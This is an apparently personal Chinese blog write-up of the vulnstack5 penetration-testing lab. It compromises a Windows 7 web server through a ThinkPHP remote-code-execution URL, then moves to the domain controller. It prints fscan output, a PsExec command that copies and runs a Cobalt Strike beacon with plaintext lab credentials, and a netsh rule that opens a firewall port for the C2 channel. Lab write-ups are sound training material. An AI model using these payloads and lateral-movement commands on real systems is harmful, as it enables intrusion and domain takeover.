vlunstack5

随便练练!

基本配置

  • Win7
    • 192.168.31.0/24, 192.168.138.0/24
    • sun\leo 123.com
    • sun\Administrator dc123.com
    • 打开 C 盘下的 phpStudy
  • DC
    • 192.168.138.0/24
    • sun\admin 2020.com

nmap扫一手

图片[1]-vlunstack5-魔法少女雪殇

web开的是个thinkphp,直接打

http://192.168.31.44/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

进行一个cs上线

图片[2]-vlunstack5-魔法少女雪殇

图片[3]-vlunstack5-魔法少女雪殇

进行一波信息收集

fscan扫了一波

+] received output:

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.2
start infoscan
(icmp) Target 192.168.138.136 is alive
(icmp) Target 192.168.138.138 is alive
[*] Icmp alive hosts len is: 2
192.168.138.136:139 open
192.168.138.138:135 open
192.168.138.138:88 open
192.168.138.136:3306 open
192.168.138.138:445 open
192.168.138.136:445 open
192.168.138.138:139 open
192.168.138.136:135 open
192.168.138.136:80 open
[*] alive ports len is: 9
start vulscan
[*] NetInfo:
[*]192.168.138.136
   [->]win7
   [->]192.168.138.136
   [->]192.168.31.44
[+] 192.168.138.136	MS17-010	(Windows 7 Professional 7601 Service Pack 1)
[*] WebTitle: http://192.168.138.136    code:200 len:931    title:None
[*] NetBios: 192.168.138.136 win7.sun.com                        Windows 7 Professional 7601 Service Pack 1 
[*] NetBios: 192.168.138.138 [+]DC DC.sun.com                    Windows Server 2008 HPC Edition 7600 
[*] NetInfo:
[*]192.168.138.138
   [->]DC
   [->]192.168.138.138
[+] 192.168.138.138	MS17-010	(Windows Server 2008 HPC Edition 7600)

[+] received output:
[+] http://192.168.138.136 poc-yaml-thinkphp5-controller-rce 

[+] received output:
[+] http://192.168.138.136 poc-yaml-thinkphp5023-method-rce poc1

有一个dc域,能打17010

先用svc把当前主机提权了。

图片[4]-vlunstack5-魔法少女雪殇

抓到域控密码:

图片[5]-vlunstack5-魔法少女雪殇

接下来打域控,域控在内网,把当前win7先做个中转

然后既然有密码了psexec上木马就行了

shell C:\phpStudy\PHPTutorial\WWW\public\PsExec64.exe -accepteula \\192.168.138.138 -u sun\Administrator -p dc123.com -d -c C:\phpStudy\PHPTutorial\WWW\public\beacon.exe
图片[6]-vlunstack5-魔法少女雪殇

难蚌,忘了靶机那边改密码了

改好后再打

上线失败,猜测是win7端口开了防火墙,放行一下cs端口

shell netsh advfirewall firewall add rule name=cs dir=in action=allow protocol=TCP localport=4445
图片[7]-vlunstack5-魔法少女雪殇

再次运行,上线成功

图片[8]-vlunstack5-魔法少女雪殇

最后再提权一手,结束

图片[9]-vlunstack5-魔法少女雪殇

© 版权声明
THE END
喜欢就支持一下吧
点赞11 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情

    暂无评论内容